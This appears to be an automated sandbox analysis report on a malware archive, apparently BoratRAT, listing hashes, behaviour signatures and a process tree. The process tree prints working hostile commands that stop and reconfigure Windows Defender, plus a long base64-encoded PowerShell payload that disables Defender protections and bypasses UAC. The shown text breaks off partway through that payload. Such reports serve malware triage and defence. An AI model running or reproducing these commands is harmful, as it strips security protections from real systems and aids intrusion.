Analysis

  • max time kernel
    830s
  • max time network
    489s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-06-2024 18:40

General

  • Target

    Borat.rar

  • Size

    9.6MB

  • MD5

    e3b10d235c365ac49d6855df0432bb76

  • SHA1

    4ce182c19796cf8d4c017fdd8fd4b390de1eac7e

  • SHA256

    53cdc49c7fb83b419c07edb45c544b106aaa37db00e8a37211678af6350a82f1

  • SHA512

    bb91a4bf979516c2a19733772b4c34b09b45efbcec491f2fb62adde9222e6306ce32a17de3e6f9b3d7338a93f3d72e4747a23157675663f00e9f153bc4ec4704

  • SSDEEP

    196608:XrmtNiLocMQin2MKY9U6Qw9w/ZpX4ff5c4lgg0:7mt5tn2y9Woff5c4G

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Renames multiple (7080) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Modifies Windows Defender Real-time Protection settings
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:1876
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:2516
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2156
          • C:\Windows\system32\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
              PID:4952
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
              3⤵
              • Launches sc.exe
              PID:4272
        • C:\Windows\system32\cmd.exe
          cmd /c C:\Users\Admin\AppData\Local\Temp\Borat.rar
          1⤵
            PID:3740
          • C:\Windows\system32\OpenWith.exe
            C:\Windows\system32\OpenWith.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1784
          • C:\Windows\System32\rundll32.exe
            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            1⤵
              PID:1696
            • C:\Program Files\7-Zip\7zG.exe
              "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Borat\" -spe -an -ai#7zMap29299:68:7zEvent27585
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:3420
            • C:\Users\Admin\Desktop\Borat\BoratRat.exe
              "C:\Users\Admin\Desktop\Borat\BoratRat.exe"
              1⤵
              • Executes dropped EXE
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:3008
            • C:\Windows\system32\wbem\WmiApSrv.exe
              C:\Windows\system32\wbem\WmiApSrv.exe
              1⤵
                PID:3964
              • C:\Users\Admin\Desktop\Borat\Client.exe
                "C:\Users\Admin\Desktop\Borat\Client.exe"
                1⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1220
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAH